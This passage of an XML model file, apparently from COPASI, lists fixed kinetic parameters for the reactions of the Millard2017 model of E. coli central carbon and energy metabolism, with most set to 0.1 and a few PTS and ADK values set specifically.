<ModelParameter cn="CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Reactions[FBA],ParameterGroup=Parameters,Parameter=k1" value="0.10000000000000001" type="ReactionParameter" simulationType="fixed"/>
<ModelParameter cn="CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Reactions[FBA],ParameterGroup=Parameters,Parameter=k2" value="0.10000000000000001" type="ReactionParameter" simulationType="fixed"/>
</ModelParameterGroup>
<ModelParameterGroup cn="CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Reactions[TPI]" type="Reaction">
<ModelParameter cn="CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Reactions[TPI],ParameterGroup=Parameters,Parameter=k1" value="0.10000000000000001" type="ReactionParameter" simulationType="fixed"/>
<ModelParameter cn="CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Reactions[TPI],ParameterGroup=Parameters,Parameter=k2" value="0.10000000000000001" type="ReactionParameter" simulationType="fixed"/>
</ModelParameterGroup>
<ModelParameterGroup cn="CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Reactions[GDH]" type="Reaction">
<ModelParameter cn="CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Reactions[GDH],ParameterGroup=Parameters,Parameter=k1" value="0.10000000000000001" type="ReactionParameter" simulationType="fixed"/>
<ModelParameter cn="CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Reactions[GDH],ParameterGroup=Parameters,Parameter=k2" value="0.10000000000000001" type="ReactionParameter" simulationType="fixed"/>
</ModelParameterGroup>
<ModelParameterGroup cn="CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Reactions[PGK]" type="Reaction">
<ModelParameter cn="CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Reactions[PGK],ParameterGroup=Parameters,Parameter=k1" value="0.10000000000000001" type="ReactionParameter" simulationType="fixed"/>
<ModelParameter cn="CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Reactions[PGK],ParameterGroup=Parameters,Parameter=k2" value="0.10000000000000001" type="ReactionParameter" simulationType="fixed"/>
</ModelParameterGroup>
<ModelParameterGroup cn="CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Reactions[GPM]" type="Reaction">
<ModelParameter cn="CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Reactions[GPM],ParameterGroup=Parameters,Parameter=k1" value="0.10000000000000001" type="ReactionParameter" simulationType="fixed"/>
<ModelParameter cn="CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Reactions[GPM],ParameterGroup=Parameters,Parameter=k2" value="0.10000000000000001" type="ReactionParameter" simulationType="fixed"/>
</ModelParameterGroup>
<ModelParameterGroup cn="CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Reactions[ENO]" type="Reaction">
<ModelParameter cn="CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Reactions[ENO],ParameterGroup=Parameters,Parameter=k1" value="0.10000000000000001" type="ReactionParameter" simulationType="fixed"/>
<ModelParameter cn="CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Reactions[ENO],ParameterGroup=Parameters,Parameter=k2" value="0.10000000000000001" type="ReactionParameter" simulationType="fixed"/>
</ModelParameterGroup>
<ModelParameterGroup cn="CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Reactions[PYK]" type="Reaction">
<ModelParameter cn="CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Reactions[PYK],ParameterGroup=Parameters,Parameter=k1" value="0.10000000000000001" type="ReactionParameter" simulationType="fixed"/>
</ModelParameterGroup>
<ModelParameterGroup cn="CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Reactions[ZWF]" type="Reaction">
<ModelParameter cn="CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Reactions[ZWF],ParameterGroup=Parameters,Parameter=k1" value="0.10000000000000001" type="ReactionParameter" simulationType="fixed"/>
<ModelParameter cn="CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Reactions[ZWF],ParameterGroup=Parameters,Parameter=k2" value="0.10000000000000001" type="ReactionParameter" simulationType="fixed"/>
</ModelParameterGroup>
<ModelParameterGroup cn="CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Reactions[PGL]" type="Reaction">
<ModelParameter cn="CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Reactions[PGL],ParameterGroup=Parameters,Parameter=k1" value="0.10000000000000001" type="ReactionParameter" simulationType="fixed"/>
<ModelParameter cn="CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Reactions[PGL],ParameterGroup=Parameters,Parameter=k2" value="0.10000000000000001" type="ReactionParameter" simulationType="fixed"/>
</ModelParameterGroup>
<ModelParameterGroup cn="CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Reactions[GND]" type="Reaction">
<ModelParameter cn="CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Reactions[GND],ParameterGroup=Parameters,Parameter=k1" value="0.10000000000000001" type="ReactionParameter" simulationType="fixed"/>
<ModelParameter cn="CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Reactions[GND],ParameterGroup=Parameters,Parameter=k2" value="0.10000000000000001" type="ReactionParameter" simulationType="fixed"/>
</ModelParameterGroup>
<ModelParameterGroup cn="CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Reactions[RPE]" type="Reaction">
<ModelParameter cn="CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Reactions[RPE],ParameterGroup=Parameters,Parameter=k1" value="0.10000000000000001" type="ReactionParameter" simulationType="fixed"/>
<ModelParameter cn="CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Reactions[RPE],ParameterGroup=Parameters,Parameter=k2" value="0.10000000000000001" type="ReactionParameter" simulationType="fixed"/>
</ModelParameterGroup>
<ModelParameterGroup cn="CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Reactions[RPI]" type="Reaction">
<ModelParameter cn="CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Reactions[RPI],ParameterGroup=Parameters,Parameter=k1" value="0.10000000000000001" type="ReactionParameter" simulationType="fixed"/>
<ModelParameter cn="CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Reactions[RPI],ParameterGroup=Parameters,Parameter=k2" value="0.10000000000000001" type="ReactionParameter" simulationType="fixed"/>
</ModelParameterGroup>
<ModelParameterGroup cn="CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Reactions[X5P_GAP_TKT]" type="Reaction">
<ModelParameter cn="CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Reactions[X5P_GAP_TKT],ParameterGroup=Parameters,Parameter=k1" value="0.10000000000000001" type="ReactionParameter" simulationType="fixed"/>
<ModelParameter cn="CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Reactions[X5P_GAP_TKT],ParameterGroup=Parameters,Parameter=k2" value="0.10000000000000001" type="ReactionParameter" simulationType="fixed"/>
</ModelParameterGroup>
<ModelParameterGroup cn="CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Reactions[F6P_E4P_TKT]" type="Reaction">
<ModelParameter cn="CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Reactions[F6P_E4P_TKT],ParameterGroup=Parameters,Parameter=k1" value="0.10000000000000001" type="ReactionParameter" simulationType="fixed"/>
<ModelParameter cn="CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Reactions[F6P_E4P_TKT],ParameterGroup=Parameters,Parameter=k2" value="0.10000000000000001" type="ReactionParameter" simulationType="fixed"/>
</ModelParameterGroup>
<ModelParameterGroup cn="CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Reactions[S7P_R5P_TKT]" type="Reaction">
<ModelParameter cn="CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Reactions[S7P_R5P_TKT],ParameterGroup=Parameters,Parameter=k1" value="0.10000000000000001" type="ReactionParameter" simulationType="fixed"/>
<ModelParameter cn="CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Reactions[S7P_R5P_TKT],ParameterGroup=Parameters,Parameter=k2" value="0.10000000000000001" type="ReactionParameter" simulationType="fixed"/>
</ModelParameterGroup>
<ModelParameterGroup cn="CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Reactions[F6P_GAP_TAL]" type="Reaction">
<ModelParameter cn="CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Reactions[F6P_GAP_TAL],ParameterGroup=Parameters,Parameter=k1" value="0.10000000000000001" type="ReactionParameter" simulationType="fixed"/>
<ModelParameter cn="CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Reactions[F6P_GAP_TAL],ParameterGroup=Parameters,Parameter=k2" value="0.10000000000000001" type="ReactionParameter" simulationType="fixed"/>
</ModelParameterGroup>
<ModelParameterGroup cn="CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Reactions[S7P_E4P_TAL]" type="Reaction">
<ModelParameter cn="CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Reactions[S7P_E4P_TAL],ParameterGroup=Parameters,Parameter=k1" value="0.10000000000000001" type="ReactionParameter" simulationType="fixed"/>
<ModelParameter cn="CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Reactions[S7P_E4P_TAL],ParameterGroup=Parameters,Parameter=k2" value="0.10000000000000001" type="ReactionParameter" simulationType="fixed"/>
</ModelParameterGroup>
<ModelParameterGroup cn="CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Reactions[FBP]" type="Reaction">
<ModelParameter cn="CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Reactions[FBP],ParameterGroup=Parameters,Parameter=k1" value="0.10000000000000001" type="ReactionParameter" simulationType="fixed"/>
</ModelParameterGroup>
<ModelParameterGroup cn="CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Reactions[PPC]" type="Reaction">
<ModelParameter cn="CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Reactions[PPC],ParameterGroup=Parameters,Parameter=k1" value="0.10000000000000001" type="ReactionParameter" simulationType="fixed"/>
<ModelParameter cn="CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Reactions[PPC],ParameterGroup=Parameters,Parameter=k2" value="0.10000000000000001" type="ReactionParameter" simulationType="fixed"/>
</ModelParameterGroup>
<ModelParameterGroup cn="CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Reactions[PCK]" type="Reaction">
<ModelParameter cn="CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Reactions[PCK],ParameterGroup=Parameters,Parameter=k1" value="0.10000000000000001" type="ReactionParameter" simulationType="fixed"/>
<ModelParameter cn="CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Reactions[PCK],ParameterGroup=Parameters,Parameter=k2" value="0.10000000000000001" type="ReactionParameter" simulationType="fixed"/>
</ModelParameterGroup>
<ModelParameterGroup cn="CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Reactions[PPS]" type="Reaction">
<ModelParameter cn="CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Reactions[PPS],ParameterGroup=Parameters,Parameter=k1" value="0.10000000000000001" type="ReactionParameter" simulationType="fixed"/>
</ModelParameterGroup>
<ModelParameterGroup cn="CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Reactions[MAE]" type="Reaction">
<ModelParameter cn="CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Reactions[MAE],ParameterGroup=Parameters,Parameter=k1" value="0.10000000000000001" type="ReactionParameter" simulationType="fixed"/>
</ModelParameterGroup>
<ModelParameterGroup cn="CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Reactions[PDH]" type="Reaction">
<ModelParameter cn="CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Reactions[PDH],ParameterGroup=Parameters,Parameter=k1" value="0.10000000000000001" type="ReactionParameter" simulationType="fixed"/>
<ModelParameter cn="CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Reactions[PDH],ParameterGroup=Parameters,Parameter=k2" value="0.10000000000000001" type="ReactionParameter" simulationType="fixed"/>
</ModelParameterGroup>
<ModelParameterGroup cn="CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Reactions[GLT]" type="Reaction">
<ModelParameter cn="CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Reactions[GLT],ParameterGroup=Parameters,Parameter=k1" value="0.10000000000000001" type="ReactionParameter" simulationType="fixed"/>
<ModelParameter cn="CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Reactions[GLT],ParameterGroup=Parameters,Parameter=k2" value="0.10000000000000001" type="ReactionParameter" simulationType="fixed"/>
</ModelParameterGroup>
<ModelParameterGroup cn="CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Reactions[ACN_1]" type="Reaction">
<ModelParameter cn="CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Reactions[ACN_1],ParameterGroup=Parameters,Parameter=k1" value="0.10000000000000001" type="ReactionParameter" simulationType="fixed"/>
<ModelParameter cn="CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Reactions[ACN_1],ParameterGroup=Parameters,Parameter=k2" value="0.10000000000000001" type="ReactionParameter" simulationType="fixed"/>
</ModelParameterGroup>
<ModelParameterGroup cn="CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Reactions[ACN_2]" type="Reaction">
<ModelParameter cn="CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Reactions[ACN_2],ParameterGroup=Parameters,Parameter=k1" value="0.10000000000000001" type="ReactionParameter" simulationType="fixed"/>
<ModelParameter cn="CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Reactions[ACN_2],ParameterGroup=Parameters,Parameter=k2" value="0.10000000000000001" type="ReactionParameter" simulationType="fixed"/>
</ModelParameterGroup>
<ModelParameterGroup cn="CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Reactions[ICD]" type="Reaction">
<ModelParameter cn="CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Reactions[ICD],ParameterGroup=Parameters,Parameter=k1" value="0.10000000000000001" type="ReactionParameter" simulationType="fixed"/>
</ModelParameterGroup>
<ModelParameterGroup cn="CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Reactions[LPD]" type="Reaction">
<ModelParameter cn="CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Reactions[LPD],ParameterGroup=Parameters,Parameter=k1" value="0.10000000000000001" type="ReactionParameter" simulationType="fixed"/>
</ModelParameterGroup>
<ModelParameterGroup cn="CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Reactions[SK]" type="Reaction">
<ModelParameter cn="CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Reactions[SK],ParameterGroup=Parameters,Parameter=k1" value="0.10000000000000001" type="ReactionParameter" simulationType="fixed"/>
<ModelParameter cn="CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Reactions[SK],ParameterGroup=Parameters,Parameter=k2" value="0.10000000000000001" type="ReactionParameter" simulationType="fixed"/>
</ModelParameterGroup>
<ModelParameterGroup cn="CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Reactions[SDH]" type="Reaction">
<ModelParameter cn="CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Reactions[SDH],ParameterGroup=Parameters,Parameter=k1" value="0.10000000000000001" type="ReactionParameter" simulationType="fixed"/>
<ModelParameter cn="CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Reactions[SDH],ParameterGroup=Parameters,Parameter=k2" value="0.10000000000000001" type="ReactionParameter" simulationType="fixed"/>
</ModelParameterGroup>
<ModelParameterGroup cn="CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Reactions[FUMA]" type="Reaction">
<ModelParameter cn="CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Reactions[FUMA],ParameterGroup=Parameters,Parameter=k1" value="0.10000000000000001" type="ReactionParameter" simulationType="fixed"/>
<ModelParameter cn="CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Reactions[FUMA],ParameterGroup=Parameters,Parameter=k2" value="0.10000000000000001" type="ReactionParameter" simulationType="fixed"/>
</ModelParameterGroup>
<ModelParameterGroup cn="CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Reactions[MQO]" type="Reaction">
<ModelParameter cn="CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Reactions[MQO],ParameterGroup=Parameters,Parameter=k1" value="0.10000000000000001" type="ReactionParameter" simulationType="fixed"/>
<ModelParameter cn="CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Reactions[MQO],ParameterGroup=Parameters,Parameter=k2" value="0.10000000000000001" type="ReactionParameter" simulationType="fixed"/>
</ModelParameterGroup>
<ModelParameterGroup cn="CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Reactions[MDH]" type="Reaction">
<ModelParameter cn="CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Reactions[MDH],ParameterGroup=Parameters,Parameter=k1" value="0.10000000000000001" type="ReactionParameter" simulationType="fixed"/>
<ModelParameter cn="CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Reactions[MDH],ParameterGroup=Parameters,Parameter=k2" value="0.10000000000000001" type="ReactionParameter" simulationType="fixed"/>
</ModelParameterGroup>
<ModelParameterGroup cn="CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Reactions[ACEA]" type="Reaction">
<ModelParameter cn="CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Reactions[ACEA],ParameterGroup=Parameters,Parameter=k1" value="0.10000000000000001" type="ReactionParameter" simulationType="fixed"/>
<ModelParameter cn="CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Reactions[ACEA],ParameterGroup=Parameters,Parameter=k2" value="0.10000000000000001" type="ReactionParameter" simulationType="fixed"/>
</ModelParameterGroup>
<ModelParameterGroup cn="CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Reactions[ACEB]" type="Reaction">
<ModelParameter cn="CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Reactions[ACEB],ParameterGroup=Parameters,Parameter=k1" value="0.10000000000000001" type="ReactionParameter" simulationType="fixed"/>
<ModelParameter cn="CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Reactions[ACEB],ParameterGroup=Parameters,Parameter=k2" value="0.10000000000000001" type="ReactionParameter" simulationType="fixed"/>
</ModelParameterGroup>
<ModelParameterGroup cn="CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Reactions[ACEK_1]" type="Reaction">
<ModelParameter cn="CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Reactions[ACEK_1],ParameterGroup=Parameters,Parameter=k1" value="0.10000000000000001" type="ReactionParameter" simulationType="fixed"/>
<ModelParameter cn="CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Reactions[ACEK_1],ParameterGroup=Parameters,Parameter=k2" value="0.10000000000000001" type="ReactionParameter" simulationType="fixed"/>
</ModelParameterGroup>
<ModelParameterGroup cn="CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Reactions[ACEK_2]" type="Reaction">
<ModelParameter cn="CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Reactions[ACEK_2],ParameterGroup=Parameters,Parameter=k1" value="0.10000000000000001" type="ReactionParameter" simulationType="fixed"/>
</ModelParameterGroup>
<ModelParameterGroup cn="CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Reactions[EDD]" type="Reaction">
<ModelParameter cn="CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Reactions[EDD],ParameterGroup=Parameters,Parameter=k1" value="0.10000000000000001" type="ReactionParameter" simulationType="fixed"/>
<ModelParameter cn="CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Reactions[EDD],ParameterGroup=Parameters,Parameter=k2" value="0.10000000000000001" type="ReactionParameter" simulationType="fixed"/>
</ModelParameterGroup>
<ModelParameterGroup cn="CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Reactions[EDA]" type="Reaction">
<ModelParameter cn="CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Reactions[EDA],ParameterGroup=Parameters,Parameter=k1" value="0.10000000000000001" type="ReactionParameter" simulationType="fixed"/>
<ModelParameter cn="CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Reactions[EDA],ParameterGroup=Parameters,Parameter=k2" value="0.10000000000000001" type="ReactionParameter" simulationType="fixed"/>
</ModelParameterGroup>
<ModelParameterGroup cn="CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Reactions[NDHI]" type="Reaction">
<ModelParameter cn="CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Reactions[NDHI],ParameterGroup=Parameters,Parameter=k1" value="0.10000000000000001" type="ReactionParameter" simulationType="fixed"/>
</ModelParameterGroup>
<ModelParameterGroup cn="CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Reactions[PNT]" type="Reaction">
<ModelParameter cn="CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Reactions[PNT],ParameterGroup=Parameters,Parameter=k1" value="0.10000000000000001" type="ReactionParameter" simulationType="fixed"/>
<ModelParameter cn="CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Reactions[PNT],ParameterGroup=Parameters,Parameter=k2" value="0.10000000000000001" type="ReactionParameter" simulationType="fixed"/>
</ModelParameterGroup>
<ModelParameterGroup cn="CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Reactions[ADK]" type="Reaction">
<ModelParameter cn="CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Reactions[ADK],ParameterGroup=Parameters,Parameter=Keq" value="0.962758" type="ReactionParameter" simulationType="fixed"/>
<ModelParameter cn="CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Reactions[ADK],ParameterGroup=Parameters,Parameter=k" value="0.242256" type="ReactionParameter" simulationType="fixed"/>
</ModelParameterGroup>
<ModelParameterGroup cn="CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Reactions[ATP_SYN]" type="Reaction">
<ModelParameter cn="CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Reactions[ATP_SYN],ParameterGroup=Parameters,Parameter=k1" value="0.10000000000000001" type="ReactionParameter" simulationType="fixed"/>
</ModelParameterGroup>
<ModelParameterGroup cn="CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Reactions[CYA]" type="Reaction">
<ModelParameter cn="CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Reactions[CYA],ParameterGroup=Parameters,Parameter=k1" value="0.10000000000000001" type="ReactionParameter" simulationType="fixed"/>
<ModelParameter cn="CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Reactions[CYA],ParameterGroup=Parameters,Parameter=k2" value="0.10000000000000001" type="ReactionParameter" simulationType="fixed"/>
</ModelParameterGroup>
<ModelParameterGroup cn="CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Reactions[DOS]" type="Reaction">
<ModelParameter cn="CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Reactions[DOS],ParameterGroup=Parameters,Parameter=k1" value="0.10000000000000001" type="ReactionParameter" simulationType="fixed"/>
</ModelParameterGroup>
<ModelParameterGroup cn="CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Reactions[ACK]" type="Reaction">
<ModelParameter cn="CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Reactions[ACK],ParameterGroup=Parameters,Parameter=k1" value="0.10000000000000001" type="ReactionParameter" simulationType="fixed"/>
<ModelParameter cn="CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Reactions[ACK],ParameterGroup=Parameters,Parameter=k2" value="0.10000000000000001" type="ReactionParameter" simulationType="fixed"/>
</ModelParameterGroup>
<ModelParameterGroup cn="CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Reactions[ACS]" type="Reaction">
<ModelParameter cn="CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Reactions[ACS],ParameterGroup=Parameters,Parameter=k1" value="0.10000000000000001" type="ReactionParameter" simulationType="fixed"/>
</ModelParameterGroup>
<ModelParameterGroup cn="CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Reactions[PTA]" type="Reaction">
<ModelParameter cn="CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Reactions[PTA],ParameterGroup=Parameters,Parameter=k1" value="0.10000000000000001" type="ReactionParameter" simulationType="fixed"/>
<ModelParameter cn="CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Reactions[PTA],ParameterGroup=Parameters,Parameter=k2" value="0.10000000000000001" type="ReactionParameter" simulationType="fixed"/>
</ModelParameterGroup>
<ModelParameterGroup cn="CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Reactions[PTS_0]" type="Reaction">
<ModelParameter cn="CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Reactions[PTS_0],ParameterGroup=Parameters,Parameter=k1" value="0.10000000000000001" type="ReactionParameter" simulationType="fixed"/>
<ModelParameter cn="CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Reactions[PTS_0],ParameterGroup=Parameters,Parameter=k2" value="0.10000000000000001" type="ReactionParameter" simulationType="fixed"/>
</ModelParameterGroup>
<ModelParameterGroup cn="CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Reactions[PTS_1]" type="Reaction">
<ModelParameter cn="CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Reactions[PTS_1],ParameterGroup=Parameters,Parameter=k1" value="200000" type="ReactionParameter" simulationType="fixed"/>
<ModelParameter cn="CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Reactions[PTS_1],ParameterGroup=Parameters,Parameter=k2" value="8000" type="ReactionParameter" simulationType="fixed"/>
</ModelParameterGroup>
<ModelParameterGroup cn="CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Reactions[PTS_2]" type="Reaction">
<ModelParameter cn="CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Reactions[PTS_2],ParameterGroup=Parameters,Parameter=k1" value="61000" type="ReactionParameter" simulationType="fixed"/>
<ModelParameter cn="CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Reactions[PTS_2],ParameterGroup=Parameters,Parameter=k2" value="47000" type="ReactionParameter" simulationType="fixed"/>
</ModelParameterGroup>
<ModelParameterGroup cn="CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Reactions[PTS_3]" type="Reaction">
<ModelParameter cn="CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Reactions[PTS_3],ParameterGroup=Parameters,Parameter=k1" value="11000" type="ReactionParameter" simulationType="fixed"/>
<ModelParameter cn="CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Reactions[PTS_3],ParameterGroup=Parameters,Parameter=k2" value="4000" type="ReactionParameter" simulationType="fixed"/>
</ModelParameterGroup>
<ModelParameterGroup cn="CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Reactions[PTS_4]" type="Reaction">
<ModelParameter cn="CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Reactions[PTS_4],ParameterGroup=Parameters,Parameter=k1" value="0.10000000000000001" type="ReactionParameter" simulationType="fixed"/>
<ModelParameter cn="CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Reactions[PTS_4],ParameterGroup=Parameters,Parameter=k2" value="0.10000000000000001" type="ReactionParameter" simulationType="fixed"/>
</ModelParameterGroup>
<ModelParameterGroup cn="CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Reactions[_GLC_FEED]" type="Reaction">
<ModelParameter cn="CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Reactions[_GLC_FEED],ParameterGroup=Parameters,Parameter=v" value="0.10000000000000001" type="ReactionParameter" simulationType="fixed"/>
</ModelParameterGroup>
<ModelParameterGroup cn="CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Reactions[CYTBO]" type="Reaction">
